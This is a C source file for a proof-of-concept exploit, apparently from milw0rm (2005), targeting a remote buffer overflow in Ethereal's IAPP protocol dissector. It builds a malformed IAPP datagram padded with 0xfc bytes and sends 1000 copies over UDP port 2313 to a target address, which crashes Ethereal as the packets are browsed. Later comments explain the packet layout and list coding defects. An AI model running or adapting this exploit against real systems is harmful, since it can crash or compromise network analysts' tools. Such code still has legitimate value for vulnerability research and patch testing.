/*
 *
 * Ethereal IAPP remote buffer overflow #2 PoC exploit
 * ---------------------------------------------------
 * To test this vulnerability on Windows, try to send 3-10 packets
 * that will trigger the crash, and scroll between captured packets
 * in Ethereal.
 *
 * Coded by Leon Juranic <ljuranic@lss.hr>
 * LSS Security <http://security.lss.hr/en/>
 *
 */
#include <stdio.h>
#include <string.h>
#include <windows.h>

#pragma comment (lib,"ws2_32")
#define IAPP_PDU_SSID 0   /* not referenced anywhere in this file */
/*
 * IAPP header overlaid on the first two bytes of the datagram buffer in
 * xp_sendpacket(): a version byte followed by a type byte, both set to 1
 * there. Every member is a single byte, so there is no padding between
 * them. Note the tag name begins with an underscore, which C reserves for
 * the implementation at file scope.
 */
typedef struct _e_iapphdr {
    unsigned char ia_version;   /* set to 1 by xp_sendpacket() */
    unsigned char ia_type;      /* set to 1 by xp_sendpacket() */
} e_iapphdr;
/*
 * PDU header that xp_sendpacket() overlays at buf+2, directly after the
 * IAPP header: a type byte and a two-byte length, high byte first. All
 * members are single bytes, so the struct has no padding and matches the
 * byte layout written to the wire. Tag name starts with an underscore,
 * which is reserved at file scope.
 */
typedef struct _e_pduhdr {
    unsigned char pdu_type;    /* set to 3 by xp_sendpacket() */
    unsigned char pdu_len_h;   /* length, high byte */
    unsigned char pdu_len_l;   /* length, low byte */
} e_pduhdr;
32
33
/*
 * Build one IAPP datagram in a stack buffer and send it 1000 times over UDP
 * to port 2313 at the address named by `pack`.
 *
 * pack: address string handed straight to inet_addr(); the result is not
 *       checked, so an unparsable string is not detected.
 *
 * Defects present in this function, left as in the original:
 *  - socket() and every sendto() return value are ignored, and neither
 *    closesocket() nor WSACleanup() is called on any path.
 *  - strncpy() copies 2000 bytes into the 1995 bytes that remain in buf
 *    after the two headers, so it writes 5 bytes past the end of buf
 *    (strncpy always pads to the full count); the source bytes beyond the
 *    1300 that memset() filled are uninitialised stack memory.
 *  - `sock` is a plain int, while Winsock's socket() returns SOCKET.
 */
void xp_sendpacket (char *pack)
{
    WORD wVersionRequested;
    WSADATA wsaData;
    int err;
    int sock,i;
    struct sockaddr_in sin;       /* never zeroed; sin_zero stays uninitialised */
    unsigned char buf[2000];      /* datagram image: 2-byte IAPP hdr, 3-byte PDU hdr, filler */
    char bla[2000];               /* filler source; only the first 1300 bytes are set */
    e_iapphdr *iapp;
    e_pduhdr *pdu;

    /* Winsock 2.2 start-up; failure terminates the whole process. */
    wVersionRequested = MAKEWORD( 2, 2 );
    err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 ) {
        printf ("error!!!\n");
        ExitProcess(-1);
    }
    sock=socket(AF_INET,SOCK_DGRAM,0);     /* unchecked: a failed socket would still reach sendto() */

    sin.sin_family=AF_INET;
    sin.sin_addr.s_addr = inet_addr(pack); /* conversion failure is not detected */
    sin.sin_port = htons(2313);

    /* Overlay the header structs on buf; both are all single bytes, so no padding. */
    iapp = (e_iapphdr*)&buf;
    iapp->ia_version = 1;
    iapp->ia_type = 1;

    pdu = (e_pduhdr*)(buf+2);
    pdu->pdu_type = 3;
    pdu->pdu_len_h = 0x05;    /* length, high byte */
    pdu->pdu_len_l = 0xa1;    /* length, low byte (0x05a1 = 1441) */

    memset (bla,'\xfc',1300);
    /* Copies 2000 bytes to buf+5 of a 2000-byte buffer: see the header comment. */
    strncpy ((char*)&buf+sizeof(e_iapphdr)+sizeof(e_pduhdr),bla,2000);

    /* 1000 identical 1489-byte datagrams; sendto() results are discarded. */
    for (i=0;i<1000;i++)
        sendto (sock,(char*)buf,1489,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
}
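/*
 * Entry point: argv[1] is the address string handed to xp_sendpacket(),
 * which passes it on to inet_addr().
 *
 * Changes from the original: an explicit `int` return type (implicit int
 * is not valid C since C99), a check that the argument exists before it is
 * dereferenced (the original read argv[1] unconditionally), and an explicit
 * return value.
 *
 * Returns 0 after sending, 1 if no address argument was supplied.
 */
int main (int argc, char **argv)
{
    if (argc < 2 || argv[1] == NULL) {
        /* argv[0] may itself be NULL when argc == 0 */
        const char *prog = (argc > 0 && argv[0] != NULL) ? argv[0] : "program";
        fprintf (stderr, "usage: %s <address>\n", prog);
        return 1;
    }
    xp_sendpacket (argv[1]);
    return 0;
}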
// milw0rm.com [2005-03-12]